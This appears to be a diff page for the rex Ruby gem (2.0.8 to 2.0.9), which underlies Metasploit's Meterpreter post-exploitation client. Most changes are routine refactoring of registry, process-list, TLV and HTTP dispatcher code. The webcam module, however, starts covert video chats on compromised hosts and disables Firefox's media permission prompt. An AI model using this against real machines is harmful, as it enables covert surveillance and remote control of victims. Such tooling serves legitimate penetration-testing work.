rex 2.0.8 → 2.0.9
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/lib/rex.rb +1 -0
- data/lib/rex/arch.rb +5 -0
- data/lib/rex/arch/x86.rb +19 -5
- data/lib/rex/arch/zarch.rb +17 -0
- data/lib/rex/compat.rb +5 -4
- data/lib/rex/constants.rb +3 -1
- data/lib/rex/encoder/alpha2/alpha_mixed.rb +70 -9
- data/lib/rex/encoder/alpha2/alpha_upper.rb +67 -8
- data/lib/rex/exploitation/cmdstager.rb +1 -0
- data/lib/rex/exploitation/cmdstager/certutil.rb +115 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +6 -3
- data/lib/rex/exploitation/egghunter.rb +1 -1
- data/lib/rex/google/geolocation.rb +68 -0
- data/lib/rex/io/bidirectional_pipe.rb +0 -4
- data/lib/rex/java/serialization.rb +2 -0
- data/lib/rex/java/serialization/decode_error.rb +11 -0
- data/lib/rex/java/serialization/encode_error.rb +11 -0
- data/lib/rex/java/serialization/model.rb +2 -0
- data/lib/rex/java/serialization/model/annotation.rb +3 -3
- data/lib/rex/java/serialization/model/block_data.rb +3 -3
- data/lib/rex/java/serialization/model/block_data_long.rb +3 -3
- data/lib/rex/java/serialization/model/class_desc.rb +6 -6
- data/lib/rex/java/serialization/model/contents.rb +17 -10
- data/lib/rex/java/serialization/model/field.rb +12 -11
- data/lib/rex/java/serialization/model/long_utf.rb +3 -3
- data/lib/rex/java/serialization/model/new_array.rb +22 -23
- data/lib/rex/java/serialization/model/new_class.rb +57 -0
- data/lib/rex/java/serialization/model/new_class_desc.rb +15 -16
- data/lib/rex/java/serialization/model/new_enum.rb +5 -5
- data/lib/rex/java/serialization/model/new_object.rb +22 -17
- data/lib/rex/java/serialization/model/proxy_class_desc.rb +109 -0
- data/lib/rex/java/serialization/model/reference.rb +4 -4
- data/lib/rex/java/serialization/model/stream.rb +7 -7
- data/lib/rex/java/serialization/model/utf.rb +3 -3
- data/lib/rex/json_hash_file.rb +94 -0
- data/lib/rex/logging/log_sink.rb +1 -0
- data/lib/rex/logging/sinks/timestamp_flatfile.rb +21 -0
- data/lib/rex/parser/appscan_nokogiri.rb +13 -23
- data/lib/rex/parser/fs/ntfs.rb +10 -5
- data/lib/rex/parser/nmap_nokogiri.rb +3 -1
- data/lib/rex/parser/openvas_nokogiri.rb +70 -73
- data/lib/rex/parser/winscp.rb +108 -0
- data/lib/rex/parser/x509_certificate.rb +92 -0
- data/lib/rex/payloads.rb +0 -1
- data/lib/rex/payloads/meterpreter/config.rb +154 -0
- data/lib/rex/payloads/meterpreter/uri_checksum.rb +136 -0
- data/lib/rex/post/meterpreter.rb +1 -1
- data/lib/rex/post/meterpreter/client.rb +26 -3
- data/lib/rex/post/meterpreter/client_core.rb +387 -75
- data/lib/rex/post/meterpreter/extensions/android/android.rb +127 -37
- data/lib/rex/post/meterpreter/extensions/android/tlv.rb +46 -25
- data/lib/rex/post/meterpreter/extensions/extapi/extapi.rb +4 -0
- data/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb +39 -0
- data/lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb +44 -0
- data/lib/rex/post/meterpreter/extensions/extapi/tlv.rb +9 -0
- data/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +16 -1
- data/lib/rex/post/meterpreter/extensions/priv/priv.rb +1 -1
- data/lib/rex/post/meterpreter/extensions/python/python.rb +114 -0
- data/lib/rex/post/meterpreter/extensions/python/tlv.rb +21 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +17 -14
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +33 -12
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/mount.rb +57 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +3 -3
- data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +3 -1
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +2 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +16 -3
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +29 -6
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +5 -1
- data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +18 -6
- data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +2 -2
- data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +34 -36
- data/lib/rex/post/meterpreter/packet.rb +29 -0
- data/lib/rex/post/meterpreter/packet_dispatcher.rb +20 -7
- data/lib/rex/post/meterpreter/ui/console.rb +1 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +230 -72
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +544 -34
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb +188 -57
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +115 -93
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb +1 -1
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb +1 -1
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +49 -15
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +11 -2
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/python.rb +187 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +324 -133
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +52 -2
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +68 -65
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +9 -1
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +113 -118
- data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +3 -0
- data/lib/rex/powershell.rb +62 -0
- data/lib/rex/powershell/command.rb +359 -0
- data/lib/rex/{exploitation/powershell → powershell}/function.rb +0 -2
- data/lib/rex/{exploitation/powershell → powershell}/obfu.rb +0 -2
- data/lib/rex/{exploitation/powershell → powershell}/output.rb +11 -5
- data/lib/rex/{exploitation/powershell → powershell}/param.rb +0 -2
- data/lib/rex/powershell/parser.rb +182 -0
- data/lib/rex/powershell/payload.rb +78 -0
- data/lib/rex/{exploitation/powershell → powershell}/psh_methods.rb +16 -2
- data/lib/rex/{exploitation/powershell → powershell}/script.rb +2 -4
- data/lib/rex/proto/dcerpc/client.rb +6 -6
- data/lib/rex/proto/dcerpc/exceptions.rb +26 -0
- data/lib/rex/proto/http/client.rb +3 -3
- data/lib/rex/proto/http/client_request.rb +0 -5
- data/lib/rex/proto/http/response.rb +86 -0
- data/lib/rex/proto/ipmi/utils.rb +30 -26
- data/lib/rex/proto/kerberos/client.rb +1 -1
- data/lib/rex/proto/kerberos/model/kdc_request.rb +2 -2
- data/lib/rex/proto/rfb/client.rb +8 -3
- data/lib/rex/proto/rfb/constants.rb +1 -1
- data/lib/rex/proto/rmi.rb +2 -0
- data/lib/rex/proto/rmi/decode_error.rb +10 -0
- data/lib/rex/proto/rmi/exception.rb +10 -0
- data/lib/rex/proto/rmi/model.rb +5 -0
- data/lib/rex/proto/rmi/model/call.rb +4 -4
- data/lib/rex/proto/rmi/model/call_data.rb +137 -0
- data/lib/rex/proto/rmi/model/dgc_ack.rb +2 -2
- data/lib/rex/proto/rmi/model/element.rb +26 -11
- data/lib/rex/proto/rmi/model/output_header.rb +4 -4
- data/lib/rex/proto/rmi/model/ping.rb +2 -2
- data/lib/rex/proto/rmi/model/ping_ack.rb +2 -2
- data/lib/rex/proto/rmi/model/protocol_ack.rb +2 -2
- data/lib/rex/proto/rmi/model/return_data.rb +5 -5
- data/lib/rex/proto/rmi/model/return_value.rb +124 -0
- data/lib/rex/proto/rmi/model/unique_identifier.rb +77 -0
- data/lib/rex/proto/steam.rb +3 -0
- data/lib/rex/proto/steam/message.rb +125 -0
- data/lib/rex/proto/tftp/client.rb +35 -14
- data/lib/rex/random_identifier_generator.rb +2 -0
- data/lib/rex/ropbuilder.rb +1 -1
- data/lib/rex/socket/parameters.rb +9 -0
- data/lib/rex/socket/ssl_tcp.rb +25 -41
- data/lib/rex/socket/ssl_tcp_server.rb +10 -21
- data/lib/rex/sslscan/result.rb +20 -1
- data/lib/rex/text.rb +241 -55
- data/lib/rex/ui/output.rb +0 -3
- data/lib/rex/ui/subscriber.rb +0 -10
- data/lib/rex/ui/text/color.rb +9 -0
- data/lib/rex/ui/text/dispatcher_shell.rb +1 -0
- data/lib/rex/ui/text/output.rb +15 -4
- data/lib/rex/ui/text/output/file.rb +1 -0
- data/lib/rex/ui/text/output/stdio.rb +0 -16
- data/lib/rex/ui/text/shell.rb +3 -0
- data/lib/rex/ui/text/table.rb +85 -19
- data/lib/rex/user_agent.rb +118 -0
- data/rex.gemspec +2 -2
- metadata +41 -14
- data/lib/rex/exploitation/powershell.rb +0 -62
- data/lib/rex/exploitation/powershell/parser.rb +0 -183
- data/lib/rex/payloads/meterpreter.rb +0 -2
- data/lib/rex/payloads/meterpreter/patch.rb +0 -136
@@ -391,13 +391,26 @@ class ProcessList < Array
|
|
391
391
|
cols.delete_if { |c| !( first.has_key?(c.downcase) ) or first[c.downcase].nil? }
|
392
392
|
|
393
393
|
opts = {
|
394
|
-
|
395
|
-
|
394
|
+
'Header' => 'Process List',
|
395
|
+
'Indent' => 1,
|
396
|
+
'Columns' => cols
|
396
397
|
}.merge(opts)
|
397
398
|
|
398
399
|
tbl = Rex::Ui::Text::Table.new(opts)
|
399
400
|
each { |process|
|
400
|
-
tbl << cols.map {|c|
|
401
|
+
tbl << cols.map { |c|
|
402
|
+
col = c.downcase
|
403
|
+
val = process[col]
|
404
|
+
if col == 'session'
|
405
|
+
val == 0xFFFFFFFF ? '' : val.to_s
|
406
|
+
elsif col == 'arch'
|
407
|
+
# for display and consistency with payload naming we switch the internal
|
408
|
+
# 'x86_64' value to display 'x64'
|
409
|
+
val == ARCH_X86_64 ? 'x64' : val
|
410
|
+
else
|
411
|
+
val
|
412
|
+
end
|
413
|
+
}.compact
|
401
414
|
}
|
402
415
|
|
403
416
|
tbl
|
@@ -77,6 +77,22 @@ class Registry
|
|
77
77
|
client, root_key, base_key, perm, response.get_tlv(TLV_TYPE_HKEY).value)
|
78
78
|
end
|
79
79
|
|
80
|
+
# Checks if a key exists on the target registry
|
81
|
+
#
|
82
|
+
# @param root_key [String] the root part of the key path. Ex: HKEY_LOCAL_MACHINE
|
83
|
+
# @param base_key [String] the base part of the key path
|
84
|
+
# @return [Boolean] true if the key exists on the target registry, false otherwise, even
|
85
|
+
# it the session hasn't permissions to access the target key.
|
86
|
+
# @raise [TimeoutError] if the timeout expires when waiting the answer
|
87
|
+
# @raise [Rex::Post::Meterpreter::RequestError] if the parameters are not valid
|
88
|
+
def Registry.check_key_exists(root_key, base_key)
|
89
|
+
request = Packet.create_request('stdapi_registry_check_key_exists')
|
90
|
+
request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
|
91
|
+
request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
|
92
|
+
response = client.send_request(request)
|
93
|
+
return response.get_tlv(TLV_TYPE_BOOL).value
|
94
|
+
end
|
95
|
+
|
80
96
|
#
|
81
97
|
# Opens the supplied registry key on the specified remote host. Requires that the
|
82
98
|
# current process has credentials to access the target and that the target has the
|
@@ -380,13 +396,20 @@ class Registry
|
|
380
396
|
# Returns the integer value associated with the supplied registry value
|
381
397
|
# type (like REG_SZ).
|
382
398
|
#
|
399
|
+
# @see https://msdn.microsoft.com/en-us/library/windows/desktop/ms724884(v=vs.85).aspx
|
400
|
+
# @param type [String] A Windows registry type constant name, e.g. 'REG_SZ'
|
401
|
+
# @return [Integer] one of the `REG_*` constants
|
383
402
|
def self.type2str(type)
|
384
|
-
|
385
|
-
|
386
|
-
|
387
|
-
|
388
|
-
|
389
|
-
|
403
|
+
case type
|
404
|
+
when 'REG_BINARY' then REG_BINARY
|
405
|
+
when 'REG_DWORD' then REG_DWORD
|
406
|
+
when 'REG_EXPAND_SZ' then REG_EXPAND_SZ
|
407
|
+
when 'REG_MULTI_SZ' then REG_MULTI_SZ
|
408
|
+
when 'REG_NONE' then REG_NONE
|
409
|
+
when 'REG_SZ' then REG_SZ
|
410
|
+
else
|
411
|
+
nil
|
412
|
+
end
|
390
413
|
end
|
391
414
|
|
392
415
|
#
|
@@ -163,7 +163,11 @@ class RegistryKey
|
|
163
163
|
# Returns the path to the key.
|
164
164
|
#
|
165
165
|
def to_s
|
166
|
-
|
166
|
+
if self.base_key.nil?
|
167
|
+
self.root_key.to_s + "\\"
|
168
|
+
else
|
169
|
+
self.root_key.to_s + "\\" + self.base_key
|
170
|
+
end
|
167
171
|
end
|
168
172
|
|
169
173
|
#
|
@@ -29,6 +29,16 @@ TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
|
|
29
29
|
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
|
30
30
|
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
|
31
31
|
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
|
32
|
+
TLV_TYPE_FILE_SHORT_NAME = TLV_META_TYPE_STRING | 1205
|
33
|
+
TLV_TYPE_FILE_HASH = TLV_META_TYPE_RAW | 1206
|
34
|
+
|
35
|
+
TLV_TYPE_MOUNT = TLV_META_TYPE_GROUP | 1207
|
36
|
+
TLV_TYPE_MOUNT_NAME = TLV_META_TYPE_STRING | 1208
|
37
|
+
TLV_TYPE_MOUNT_TYPE = TLV_META_TYPE_UINT | 1209
|
38
|
+
TLV_TYPE_MOUNT_SPACE_USER = TLV_META_TYPE_QWORD | 1210
|
39
|
+
TLV_TYPE_MOUNT_SPACE_TOTAL = TLV_META_TYPE_QWORD | 1211
|
40
|
+
TLV_TYPE_MOUNT_SPACE_FREE = TLV_META_TYPE_QWORD | 1212
|
41
|
+
TLV_TYPE_MOUNT_UNCPATH = TLV_META_TYPE_STRING | 1213
|
32
42
|
|
33
43
|
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
|
34
44
|
|
@@ -111,12 +121,14 @@ TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
|
|
111
121
|
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
|
112
122
|
|
113
123
|
# Config
|
114
|
-
TLV_TYPE_COMPUTER_NAME
|
115
|
-
TLV_TYPE_OS_NAME
|
116
|
-
TLV_TYPE_USER_NAME
|
117
|
-
TLV_TYPE_ARCHITECTURE
|
118
|
-
TLV_TYPE_LANG_SYSTEM
|
119
|
-
TLV_TYPE_SID
|
124
|
+
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
|
125
|
+
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
|
126
|
+
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
|
127
|
+
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
|
128
|
+
TLV_TYPE_LANG_SYSTEM = TLV_META_TYPE_STRING | 1044
|
129
|
+
TLV_TYPE_SID = TLV_META_TYPE_STRING | 1045
|
130
|
+
TLV_TYPE_DOMAIN = TLV_META_TYPE_STRING | 1046
|
131
|
+
TLV_TYPE_LOGGED_ON_USER_COUNT = TLV_META_TYPE_UINT | 1047
|
120
132
|
|
121
133
|
# Environment
|
122
134
|
TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100
|
@@ -157,7 +157,7 @@ class UI < Rex::Post::UI
|
|
157
157
|
|
158
158
|
# include the x64 screenshot dll if the host OS is x64
|
159
159
|
if( client.sys.config.sysinfo['Architecture'] =~ /^\S*x64\S*/ )
|
160
|
-
screenshot_path =
|
160
|
+
screenshot_path = MetasploitPayloads.meterpreter_path('screenshot','x64.dll')
|
161
161
|
if screenshot_path.nil?
|
162
162
|
raise RuntimeError, "screenshot.x64.dll not found", caller
|
163
163
|
end
|
@@ -172,7 +172,7 @@ class UI < Rex::Post::UI
|
|
172
172
|
end
|
173
173
|
|
174
174
|
# but always include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
|
175
|
-
screenshot_path =
|
175
|
+
screenshot_path = MetasploitPayloads.meterpreter_path('screenshot','x86.dll')
|
176
176
|
if screenshot_path.nil?
|
177
177
|
raise RuntimeError, "screenshot.x86.dll not found", caller
|
178
178
|
end
|
@@ -1,7 +1,5 @@
|
|
1
1
|
# -*- coding: binary -*-
|
2
2
|
|
3
|
-
#require 'rex/post/meterpreter/extensions/process'
|
4
|
-
|
5
3
|
module Rex
|
6
4
|
module Post
|
7
5
|
module Meterpreter
|
@@ -15,7 +13,6 @@ module Webcam
|
|
15
13
|
#
|
16
14
|
###
|
17
15
|
class Webcam
|
18
|
-
|
19
16
|
include Msf::Post::Common
|
20
17
|
include Msf::Post::File
|
21
18
|
include Msf::Post::WebRTC
|
@@ -31,9 +28,9 @@ class Webcam
|
|
31
28
|
def webcam_list
|
32
29
|
response = client.send_request(Packet.create_request('webcam_list'))
|
33
30
|
names = []
|
34
|
-
response.get_tlvs(
|
31
|
+
response.get_tlvs(TLV_TYPE_WEBCAM_NAME).each do |tlv|
|
35
32
|
names << tlv.value
|
36
|
-
|
33
|
+
end
|
37
34
|
names
|
38
35
|
end
|
39
36
|
|
@@ -49,11 +46,11 @@ class Webcam
|
|
49
46
|
request = Packet.create_request('webcam_get_frame')
|
50
47
|
request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
|
51
48
|
response = client.send_request(request)
|
52
|
-
response.get_tlv(
|
49
|
+
response.get_tlv(TLV_TYPE_WEBCAM_IMAGE).value
|
53
50
|
end
|
54
51
|
|
55
52
|
def webcam_stop
|
56
|
-
client.send_request(
|
53
|
+
client.send_request(Packet.create_request('webcam_stop'))
|
57
54
|
true
|
58
55
|
end
|
59
56
|
|
@@ -67,13 +64,13 @@ class Webcam
|
|
67
64
|
offerer_id = Rex::Text.rand_text_alphanumeric(10)
|
68
65
|
channel = Rex::Text.rand_text_alphanumeric(20)
|
69
66
|
|
70
|
-
remote_browser_path =
|
67
|
+
remote_browser_path = webrtc_browser_path
|
71
68
|
|
72
69
|
if remote_browser_path.blank?
|
73
|
-
|
70
|
+
fail "Unable to find a suitable browser on the target machine"
|
74
71
|
end
|
75
72
|
|
76
|
-
|
73
|
+
init_video_chat(remote_browser_path, server, channel, offerer_id)
|
77
74
|
connect_video_chat(server, channel, offerer_id)
|
78
75
|
end
|
79
76
|
|
@@ -83,40 +80,39 @@ class Webcam
|
|
83
80
|
request = Packet.create_request('webcam_audio_record')
|
84
81
|
request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
|
85
82
|
response = client.send_request(request)
|
86
|
-
response.get_tlv(
|
83
|
+
response.get_tlv(TLV_TYPE_AUDIO_DATA).value
|
87
84
|
end
|
88
85
|
|
89
86
|
attr_accessor :client
|
90
87
|
|
91
|
-
|
92
88
|
private
|
93
89
|
|
94
|
-
|
95
90
|
#
|
96
91
|
# Returns a browser path that supports WebRTC
|
97
92
|
#
|
98
93
|
# @return [String]
|
99
94
|
#
|
100
|
-
def
|
95
|
+
def webrtc_browser_path
|
101
96
|
found_browser_path = ''
|
102
97
|
|
103
98
|
case client.platform
|
104
99
|
when /win/
|
105
100
|
paths = [
|
106
|
-
"
|
107
|
-
"
|
101
|
+
"%ProgramFiles(x86)%\\Google\\Chrome\\Application\\chrome.exe",
|
102
|
+
"%ProgramFiles%\\Google\\Chrome\\Application\\chrome.exe",
|
103
|
+
"%ProgramW6432%\\Google\\Chrome\\Application\\chrome.exe",
|
104
|
+
"%ProgramFiles(x86)%\\Mozilla Firefox\\firefox.exe",
|
105
|
+
"%ProgramFiles%\\Mozilla Firefox\\firefox.exe",
|
106
|
+
"%ProgramW6432%\\Mozilla Firefox\\firefox.exe"
|
108
107
|
]
|
109
108
|
|
110
|
-
drive = session.sys.config.getenv("SYSTEMDRIVE")
|
111
|
-
paths = paths.map { |p| "#{drive}\\#{p}" }
|
112
|
-
|
113
109
|
# Old chrome path
|
114
110
|
user_profile = client.sys.config.getenv("USERPROFILE")
|
115
111
|
paths << "#{user_profile}\\Local Settings\\Application Data\\Google\\Chrome\\Application\\chrome.exe"
|
116
112
|
|
117
113
|
paths.each do |browser_path|
|
118
114
|
if file?(browser_path)
|
119
|
-
found_browser_path = browser_path
|
115
|
+
found_browser_path = client.fs.file.expand_path(browser_path)
|
120
116
|
break
|
121
117
|
end
|
122
118
|
end
|
@@ -124,7 +120,7 @@ class Webcam
|
|
124
120
|
when /osx|bsd/
|
125
121
|
[
|
126
122
|
'/Applications/Google Chrome.app',
|
127
|
-
'/Applications/Firefox.app'
|
123
|
+
'/Applications/Firefox.app'
|
128
124
|
].each do |browser_path|
|
129
125
|
if file?(browser_path)
|
130
126
|
found_browser_path = browser_path
|
@@ -140,7 +136,6 @@ class Webcam
|
|
140
136
|
found_browser_path
|
141
137
|
end
|
142
138
|
|
143
|
-
|
144
139
|
#
|
145
140
|
# Creates a video chat session as an offerer... involuntarily :-p
|
146
141
|
# Windows targets only.
|
@@ -161,9 +156,9 @@ class Webcam
|
|
161
156
|
begin
|
162
157
|
write_file("#{tmp_dir}\\interface.html", interface)
|
163
158
|
write_file("#{tmp_dir}\\api.js", api)
|
164
|
-
rescue
|
165
|
-
elog("webcam_chat failed. #{e.class} #{e
|
166
|
-
raise
|
159
|
+
rescue RuntimeError => e
|
160
|
+
elog("webcam_chat failed. #{e.class} #{e}")
|
161
|
+
raise "Unable to initialize the interface on the target machine"
|
167
162
|
end
|
168
163
|
|
169
164
|
#
|
@@ -176,26 +171,29 @@ class Webcam
|
|
176
171
|
profile_name = Rex::Text.rand_text_alpha(8)
|
177
172
|
o = cmd_exec("#{remote_browser_path} --CreateProfile #{profile_name} #{tmp_dir}\\#{profile_name}")
|
178
173
|
profile_path = (o.scan(/created profile '.+' at '(.+)'/).flatten[0] || '').strip
|
179
|
-
setting =
|
174
|
+
setting = %|user_pref("media.navigator.permission.disabled", true);|
|
180
175
|
begin
|
181
176
|
write_file(profile_path, setting)
|
182
|
-
rescue
|
183
|
-
elog("webcam_chat failed: #{e.class} #{e
|
184
|
-
raise
|
177
|
+
rescue RuntimeError => e
|
178
|
+
elog("webcam_chat failed: #{e.class} #{e}")
|
179
|
+
raise "Unable to write the necessary setting for Firefox."
|
185
180
|
end
|
186
181
|
args = "-p #{profile_name}"
|
187
182
|
end
|
188
183
|
|
189
|
-
exec_opts = {'Hidden' => false, 'Channelized' => false}
|
184
|
+
exec_opts = { 'Hidden' => false, 'Channelized' => false }
|
190
185
|
|
191
186
|
begin
|
192
187
|
session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)
|
193
|
-
rescue
|
194
|
-
elog("webcam_chat failed. #{e.class} #{e
|
195
|
-
raise
|
188
|
+
rescue RuntimeError => e
|
189
|
+
elog("webcam_chat failed. #{e.class} #{e}")
|
190
|
+
raise "Unable to start the remote browser: #{e.message}"
|
196
191
|
end
|
197
192
|
end
|
198
|
-
|
199
193
|
end
|
200
|
-
|
201
|
-
end
|
194
|
+
end
|
195
|
+
end
|
196
|
+
end
|
197
|
+
end
|
198
|
+
end
|
199
|
+
end
|
@@ -87,6 +87,23 @@ TLV_TYPE_MIGRATE_BASE_ADDR = TLV_META_TYPE_UINT | 407
|
|
87
87
|
TLV_TYPE_MIGRATE_ENTRY_POINT = TLV_META_TYPE_UINT | 408
|
88
88
|
TLV_TYPE_MIGRATE_SOCKET_PATH = TLV_META_TYPE_STRING | 409
|
89
89
|
|
90
|
+
|
91
|
+
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
|
92
|
+
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
|
93
|
+
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
|
94
|
+
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
|
95
|
+
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
|
96
|
+
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
|
97
|
+
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
|
98
|
+
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
|
99
|
+
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
|
100
|
+
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
|
101
|
+
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
|
102
|
+
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
|
103
|
+
|
104
|
+
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
|
105
|
+
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
|
106
|
+
|
90
107
|
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
|
91
108
|
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
|
92
109
|
|
@@ -179,6 +196,18 @@ class Tlv
|
|
179
196
|
when TLV_TYPE_MIGRATE_LEN; "MIGRATE-LEN"
|
180
197
|
when TLV_TYPE_MIGRATE_PAYLOAD; "MIGRATE-PAYLOAD"
|
181
198
|
when TLV_TYPE_MIGRATE_ARCH; "MIGRATE-ARCH"
|
199
|
+
when TLV_TYPE_TRANS_TYPE; "TRANS-TYPE"
|
200
|
+
when TLV_TYPE_TRANS_URL; "TRANS-URL"
|
201
|
+
when TLV_TYPE_TRANS_COMM_TIMEOUT; "TRANS-COMM-TIMEOUT"
|
202
|
+
when TLV_TYPE_TRANS_SESSION_EXP; "TRANS-SESSION-EXP"
|
203
|
+
when TLV_TYPE_TRANS_CERT_HASH; "TRANS-CERT-HASH"
|
204
|
+
when TLV_TYPE_TRANS_PROXY_HOST; "TRANS-PROXY-HOST"
|
205
|
+
when TLV_TYPE_TRANS_PROXY_USER; "TRANS-PROXY-USER"
|
206
|
+
when TLV_TYPE_TRANS_PROXY_PASS; "TRANS-PROXY-PASS"
|
207
|
+
when TLV_TYPE_TRANS_RETRY_TOTAL; "TRANS-RETRY-TOTAL"
|
208
|
+
when TLV_TYPE_TRANS_RETRY_WAIT; "TRANS-RETRY-WAIT"
|
209
|
+
when TLV_TYPE_MACHINE_ID; "MACHINE-ID"
|
210
|
+
when TLV_TYPE_UUID; "UUID"
|
182
211
|
|
183
212
|
#when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'
|
184
213
|
#when Extensions::Stdapi::TLV_TYPE_IP; 'ip-address'
|
@@ -66,9 +66,12 @@ module PacketDispatcher
|
|
66
66
|
self.waiters = []
|
67
67
|
self.alive = true
|
68
68
|
|
69
|
+
# Ensure that there is only one leading and trailing slash on the URI
|
70
|
+
resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
|
71
|
+
|
69
72
|
self.passive_service = self.passive_dispatcher
|
70
|
-
self.passive_service.remove_resource(
|
71
|
-
self.passive_service.add_resource(
|
73
|
+
self.passive_service.remove_resource(resource_uri)
|
74
|
+
self.passive_service.add_resource(resource_uri,
|
72
75
|
'Proc' => Proc.new { |cli, req| on_passive_request(cli, req) },
|
73
76
|
'VirtualDirectory' => true
|
74
77
|
)
|
@@ -76,7 +79,16 @@ module PacketDispatcher
|
|
76
79
|
|
77
80
|
def shutdown_passive_dispatcher
|
78
81
|
return if not self.passive_service
|
79
|
-
|
82
|
+
|
83
|
+
# Ensure that there is only one leading and trailing slash on the URI
|
84
|
+
resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
|
85
|
+
|
86
|
+
self.passive_service.remove_resource(resource_uri)
|
87
|
+
|
88
|
+
# If there are no more resources registered on the service, stop it entirely
|
89
|
+
if self.passive_service.resources.empty?
|
90
|
+
Rex::ServiceManager.stop_service(self.passive_service)
|
91
|
+
end
|
80
92
|
|
81
93
|
self.alive = false
|
82
94
|
self.send_queue = []
|
@@ -94,6 +106,8 @@ module PacketDispatcher
|
|
94
106
|
resp['Content-Type'] = 'application/octet-stream'
|
95
107
|
resp['Connection'] = 'close'
|
96
108
|
|
109
|
+
self.last_checkin = Time.now
|
110
|
+
|
97
111
|
# If the first 4 bytes are "RECV", return the oldest packet from the outbound queue
|
98
112
|
if req.body[0,4] == "RECV"
|
99
113
|
rpkt = send_queue.shift
|
@@ -114,9 +128,6 @@ module PacketDispatcher
|
|
114
128
|
cli.send_response(resp)
|
115
129
|
end
|
116
130
|
|
117
|
-
# Force a closure for older WinInet implementations
|
118
|
-
self.passive_service.close_client( cli )
|
119
|
-
|
120
131
|
rescue ::Exception => e
|
121
132
|
elog("Exception handling request: #{cli.inspect} #{req.inspect} #{e.class} #{e} #{e.backtrace}")
|
122
133
|
end
|
@@ -178,7 +189,6 @@ module PacketDispatcher
|
|
178
189
|
# Sends a packet and waits for a timeout for the given time interval.
|
179
190
|
#
|
180
191
|
def send_request(packet, t = self.response_timeout)
|
181
|
-
|
182
192
|
if not t
|
183
193
|
send_packet(packet)
|
184
194
|
return nil
|
@@ -490,6 +500,9 @@ module PacketDispatcher
|
|
490
500
|
client = self
|
491
501
|
end
|
492
502
|
|
503
|
+
# Update our last reply time
|
504
|
+
client.last_checkin = Time.now
|
505
|
+
|
493
506
|
